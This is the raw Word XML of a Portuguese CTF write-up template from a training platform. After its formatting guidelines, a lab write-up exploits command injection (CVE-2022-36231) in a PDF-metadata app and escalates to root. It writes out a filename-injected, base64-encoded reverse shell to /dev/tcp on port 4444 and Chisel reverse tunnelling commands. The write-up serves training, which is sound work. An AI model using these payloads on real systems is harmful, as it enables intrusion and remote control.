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BMPlexSans-bold.ttf" ContentType="application/x-font-ttf"/>
  <Override PartName="/word/fonts/IBMPlexSans-boldItalic.ttf" ContentType="application/x-font-ttf"/>
  <Override PartName="/word/fonts/IBMPlexSans-italic.ttf" ContentType="application/x-font-ttf"/>
  <Override PartName="/word/fonts/IBMPlexSans-regular.ttf" ContentType="application/x-font-ttf"/>
  <Override PartName="/word/fonts/IBMPlexSansSemiBold-bold.ttf" ContentType="application/x-font-ttf"/>
  <Override PartName="/word/fonts/IBMPlexSansSemiBold-boldItalic.ttf" ContentType="application/x-font-ttf"/>
  <Override PartName="/word/fonts/IBMPlexSansSemiBold-italic.ttf" ContentType="application/x-font-ttf"/>
  <Override PartName="/word/fonts/IBMPlexSansSemiBold-regular.ttf" ContentType="application/x-font-ttf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id06xjcrabty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3t8m4axx4m2o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</w:t>
      </w:r>
      <w:hyperlink r:id="rId6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&lt;NOME_DA_MÁQUINA&gt;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highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Se a máquina foi baseada em um pentest real, isso deve estar explícito nessa seção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Caso precise de suporte, favor abrir um ticket no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cahrt67n5qzp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 seção do documento tem como objetivo descrever a etapa de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recon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com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enumeração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de portas abertas,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fuzzing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mapeamento de acessos com usuário convidado ou sem autenticação. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Todo comando realizado deve utilizar o elemento de Bloco de código, contendo o comando para que fique fácil para o usuário copiar. Não há necessidade de colocar bloco de código com o resultado do comando, apenas com o comando realizado.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 "exemplo de comando"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Toda etapa relevante realizada deve ser acompanhada de uma figura (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screenshot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), que deve possuir moldura (borda preta de 2 pt) e legenda. Caso precise redimensionar a figura, é importante fazer pela sua diagonal, evitando que ela perca a formatação. É importante se atentar a fonte e ao tamanho utilizados: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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títulos, usar a formatação de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Título 1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ao lado esquerdo da seleção de fonte. O título deve ter sua fonte alterada para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IBM Plex Sans Seminegrito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 tamanho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18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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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textos e descrições, usar a formatação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Texto normal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ao lado esquerdo da seleção de fonte. O texto deve ter sua fonte alterada para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IBM Plex Sans Normal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96277" cy="4070588"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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277" cy="40705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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 1 - Inserindo elemento de bloco de código</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7lo9yejx6rri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Exploração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sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user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 seção deve conter os passos de exploração das vulnerabilidades identificadas na etapa anterior e deve finalizar com a obtenção da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flag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 usuário. Entretanto a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flag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deve estar ofuscada, não permitindo que o usuário leia ou copie diretamente, forçando ele a reproduzir o ataque. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Todo comando realizado deve utilizar o elemento de Bloco de código, contendo o comando para que fique fácil para o usuário copiar. Não há necessidade de colocar bloco de código com o resultado do comando, apenas com o comando realizado.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 "exemplo de comando"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Toda etapa relevante realizada deve ser acompanhada de uma figura (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screenshot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), que deve possuir moldura (borda preta de 2 pt) e legenda.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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96277" cy="4070588"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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277" cy="40705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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 2 - Inserindo elemento de bloco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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9olji020bts5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Movimentação lateral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 seção é opcional e deve conter os passos de movimentação lateral para um usuário com mais permissões ou quando o CTF envolve uma etapa intermediária, como escapar de um container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Todo comando realizado deve utilizar o elemento de Bloco de código, contendo o comando para que fique fácil para o usuário copiar. Não há necessidade de colocar bloco de código com o resultado do comando, apenas com o comando realizado.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 "exemplo de comando"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Toda etapa relevante realizada deve ser acompanhada de uma figura (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screenshot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), que deve possuir moldura (borda preta de 2 pt) e legenda.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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96277" cy="4070588"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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277" cy="40705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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 3 - Inserindo elemento de bloco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sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ual3k3aqzn69" w:id="5"/>
      <w:bookmarkEnd w:id="5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Escalação de privilégio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02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 seção deve conter os passos de exploração das vulnerabilidades de escalação de privilégio e deve finalizar com a obtenção da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flag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 root. Entretanto a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flag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deve estar ofuscada, não permitindo que o usuário leia ou copie diretamente, forçando ele a reproduzir o ataque. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Todo comando realizado deve utilizar o elemento de Bloco de código, contendo o comando para que fique fácil para o usuário copiar. Não há necessidade de colocar bloco de código com o resultado do comando, apenas com o comando realizado.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 "exemplo de comando"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Toda etapa relevante realizada deve ser acompanhada de uma figura (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screenshot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), que deve possuir moldura (borda preta de 2 pt) e legenda.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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96277" cy="4070588"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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277" cy="40705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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 4 - Inserindo elemento de bloco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>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Write-Up Injection</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Write-up injection</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>**Varredura nmap:**</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Como primeiro passo precisamos saber quais serviços estão sendo executados nos bastidores e quais portas estão abertas. Então, vamos usar uma ferramenta chamada nmap.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="136026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ap%25205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602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Podemos começar dando uma olhada na aplicação web que está sendo executada na porta 3000:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="248872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3000%252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887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Podemos observar que se trata de uma aplicação na qual podemos enviar um arquivo PDF, e ela retornará os metadados desse arquivo.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="286657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load%252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665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enviar um arquivo PDF, uma observação significativa que podemos fazer com o retorno dos metadados é que a aplicação está desenvolvida em Ruby.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Após conduzir uma pesquisa na internet sobre “read pdf” &amp; “pdfinfo”, encontrei a seguinte vulnerabilidade: CVE-2022-36231. O software pdf\info, versão 0.5.3 ou inferior, está suscetível a injeção de comandos no sistema operacional ao executar um método em um objeto PDF::Info.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[https://github.com/affix/CVE-2022-36231](https://github.com/affix/CVE-2022-36231)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Ao ter conhecimento da vulnerabilidade de injeção de comandos, é possível interceptar a requisição ao enviar o PDF utilizando o Burp Suite. Após essa etapa, podemos inserir nossa carga útil no campo "filename=".</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="162788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load%252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278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adicionar a carga útil `;$(sleep 5)`, observamos que o comando foi executado com êxito devido à espera de 5 segundos pela resposta do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Agora que conseguimos a execução remota de código, podemos incorporar uma carga útil de shell reverso.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>plain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>`echo -n "/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1'" | base64 -w0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>;$(echo -n &lt;base64&gt; |base64 -d|sh</w:t>
        <w:tab/>
        <w:t>).pdf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Ouvinte do netcat para receber a conexão:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="112485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cat%25204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248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4572000" cy="250591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loaod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059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4572000" cy="117843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%25203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784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Atualizando shell simples para TTYs totalmente interativos:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>plain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>script /dev/null -c bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ctrl+Z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>stty raw -echo;fg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>export TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="126937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ty%25203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693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Acessando a home do usuário deployer, conseguimos obter a primeira flag.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="162914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ag%2520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291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pegarmos a nossa primeira flag de usuário, é hora de escalarmos privilégios para obtermos a nossa última flag, para isso teremos que escalar para o usuário root.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Ao utilizar o comando `sudo -l`, observamos que temos permissão para executar o comando `/usr/local/bin/rails server -e development -p 8000` com as permissões do usuário root, sem a necessidade de fornecer a senha do mesmo.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[![](https://t9007105134.p.clickup-attachments.com/t9007105134/c56d4f9e-01af-45ba-af14-9741a6e29ddb/sudo-l%25201.png)](http://sudo-l%201.png)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Ao tentar iniciar o servidor no modo de desenvolvimento, observamos que a aplicação não foi iniciada devido à presença de outro processo em execução, identificado pelo PID retornado. Portanto, podemos resolver o problema removendo o arquivo [server.pid](http://server.pid) e reexecutando o comando.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="48479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do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847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4572000" cy="136794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er%2520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679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Com o servidor em execução localmente, é necessário pegar outra shell e configurar o encaminhamento de portas usando o Chisel. Isso permitirá redirecionar a conexão da porta 8000 local para nossa máquina, possibilitando assim a abertura da aplicação em nosso navegador local.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="11850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hon%25201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850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4572000" cy="95299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get%2520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529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Com o chisel no servidor, iremos primeiro executar o seguinte comando em nossa máquina local:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>plain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>./chisel server -p 9000 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="107317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isel1%2520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731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Na máquina alvo, iremos executar o seguinte comando abaixo:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>plain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>./chisel client &lt;ip-vpn&gt;:9000 R:8000:127.0.0.1:8000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="109250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aa%2520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925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concluir essas etapas, é suficiente acessarmos 127.0.0.1:8000 em nosso navegador local. Dessa forma, estaremos acessando a mesma aplicação, mas, neste caso, a aplicação está sendo executada com o usuário root. Assim, podemos explorar novamente para obtermos uma shell, permitindo-nos adquirir a última flag de root.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="200735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roo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073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4572000" cy="142688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ot%25205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268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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qnw61nncct6" w:id="6"/>
    <w:bookmarkEnd w:id="6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-866774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4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7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rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.486642040147pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.246028427965058pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2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2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&lt;NOME_DA_MÁQUINA&gt;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57975" cy="299234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617.76pt;height:793.48664204014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yperlink" Target="https://app.hackingclub.com/training/training-machines" TargetMode="External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image" Target="media/image2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4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